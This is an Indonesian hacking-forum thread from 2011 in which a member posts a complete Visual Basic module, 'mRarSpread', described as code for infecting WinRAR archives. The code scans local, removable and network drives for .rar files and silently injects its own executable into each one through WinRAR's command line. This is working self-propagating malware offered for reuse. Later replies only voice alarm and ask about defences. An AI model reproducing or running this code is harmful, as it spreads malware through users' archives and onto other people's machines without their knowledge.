|
| [VB] Code Infeksi RAR-Winrar | |
| | Pengirim | Message |
---|
digitalcat BC Security
Jumlah posting : 451 Points : 710 Reputation : 28 Join date : 31.10.11 Age : 42
| Subyek: [VB] Code Infeksi RAR-Winrar Mon Dec 05, 2011 3:51 pm | |
| - Code:
-
' Module : mRarSpread
'---------------------------------------------------------------------------------------
Option Explicit
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long Private Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long Private Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long Private Declare Function GetShortPathName Lib "kernel32.dll" Alias "GetShortPathNameA" (ByVal lpszLongPath As String, ByVal lpszShortPath As String, ByVal cchBuffer As Long) As Long Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Private Const MAX_PATH = 260 Private Const INVALID_HANDLE_VALUE = -1 Private Const FILE_ATTRIBUTE_ARCHIVE = &H20 Private Const FILE_ATTRIBUTE_DIRECTORY = &H10 Private Const FILE_ATTRIBUTE_HIDDEN = &H2 Private Const FILE_ATTRIBUTE_NORMAL = &H80 Private Const FILE_ATTRIBUTE_READONLY = &H1 Private Const FILE_ATTRIBUTE_SYSTEM = &H4 Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Type FILETIME dwLowDateTime As Long dwHighDateTime As Long End Type
Private Type WIN32_FIND_DATA dwFileAttributes As Long ftCreationTime As FILETIME ftLastAccessTime As FILETIME ftLastWriteTime As FILETIME nFileSizeHigh As Long nFileSizeLow As Long dwReserved0 As Long dwReserved1 As Long cFileName As String * MAX_PATH cAlternate As String * 14 End Type
Public Function SearchAndInfectRars() As Boolean On Error Resume Next If Dir(Environ("ProgramFiles") & "\WinRAR\WinRAR.exe") <> "" Then Dim sBuffer As String * 255 Dim sDrives As String Dim lResult As Long Dim sDrive As String Dim sPos As Integer Dim lType As Long Call CopyFile(App.Path & "\" & App.EXEName & ".exe", Environ("HOMEDRIVE") & App.EXEName & ".exe", False) lResult = GetLogicalDriveStrings(Len(sBuffer), sBuffer) sDrives = Left$(sBuffer, lResult) While Len(sDrives) > 0 sPos = InStr(sDrives, Chr$(0)) sDrive = Left$(sDrives, sPos - 1) sDrives = Mid$(sDrives, sPos + 1) lType = GetDriveType(sDrive) If lType = 2 Or lType = 3 Or lType = 4 Then Call FindFiles(Left$(sDrive, 2), "*.rar") End If Wend End If End Function
Private Function RARSpread(ByVal WinrarPath As String, ByVal RarArchive As String, ByVal Malware As String) As Boolean On Error GoTo err: If (Dir(WinrarPath) <> "") And (Dir(RarArchive) <> "") And (Dir(Malware) <> "") Then Dim lRet As Long lRet = ShellExecute(GetModuleHandle(App.Path), "open", WinrarPath, " a -y " & RarArchive & " " & Malware, "C:\", 0) If lRet = 42 Then RARSpread = True Else RARSpread = False End If Else RARSpread = False End If Exit Function err: RARSpread = False End Function
Private Sub FindFiles(ByVal vsFolderPath As String, ByVal vsSearch As String) Dim WFD As WIN32_FIND_DATA Dim hSearch As Long Dim strDirName As String
DoEvents
If Right$(vsFolderPath, 1) <> "\" Then vsFolderPath = vsFolderPath & "\" End If
hSearch = FindFirstFile(vsFolderPath & "*.*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then GetFilesInFolder vsFolderPath, vsSearch
Do If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) Then strDirName = TrimNulls(WFD.cFileName) If (strDirName <> ".") And (strDirName <> "..") Then FindFiles vsFolderPath & strDirName, vsSearch End If Loop While FindNextFile(hSearch, WFD) FindClose hSearch Kill "C:\" & App.EXEName & ".exe" End Sub
Private Sub GetFilesInFolder(ByVal vsFolderPath As String, ByVal vsSearch As String) On Error Resume Next Dim WFD As WIN32_FIND_DATA Dim hSearch As Long Dim strFileName As String Dim lVal As Long Dim short_path As String If Right$(vsFolderPath, 1) <> "\" Then vsFolderPath = vsFolderPath & "\" End If
hSearch = FindFirstFile(vsFolderPath & vsSearch, WFD) If hSearch <> INVALID_HANDLE_VALUE Then Do If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY Then strFileName = TrimNulls(WFD.cFileName) short_path = Space$(256) lVal = GetShortPathName(vsFolderPath & strFileName, short_path, Len(short_path)) Call RARSpread(Environ("ProgramFiles") & "\WinRAR\WinRAR.exe", Left$(short_path, lVal), Environ("HOMEDRIVE") & App.EXEName & ".exe") End If Loop While FindNextFile(hSearch, WFD) FindClose hSearch End If End Sub
Private Function TrimNulls(ByVal vsStringIn As String) As String If InStr(vsStringIn, Chr(0)) > 0 Then vsStringIn = Left$(vsStringIn, InStr(vsStringIn, Chr(0)) - 1) End If TrimNulls = vsStringIn End Function | |
| | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: [VB] Code Infeksi RAR-Winrar Mon Dec 05, 2011 3:53 pm | |
| | |
| | | digitalcat BC Security
Jumlah posting : 451 Points : 710 Reputation : 28 Join date : 31.10.11 Age : 42
| Subyek: Re: [VB] Code Infeksi RAR-Winrar Mon Dec 05, 2011 9:30 pm | |
| Visual Basic modul code untuk infeksi winrar | |
| | | dark_kiddy VIP Member
Jumlah posting : 176 Points : 229 Reputation : 6 Join date : 24.10.11 Age : 34 Lokasi : Makassar
| Subyek: Re: [VB] Code Infeksi RAR-Winrar Mon Dec 05, 2011 11:36 pm | |
| wah...~!!! gawat jg nich om klo sampe isi2 kampi ene kena...!!! hampir semua pake winrar nichh...!!! siaga 1 berjalan klo bisa share jg nich cara atasinX | |
| | | robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: Re: [VB] Code Infeksi RAR-Winrar Tue Jan 24, 2012 1:35 pm | |
| weeew ? bahaya ini.. siapsiap backup file ini om | |
| | | Sponsored content
| Subyek: Re: [VB] Code Infeksi RAR-Winrar | |
| |
| | | | [VB] Code Infeksi RAR-Winrar | |
|
Similar topics | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|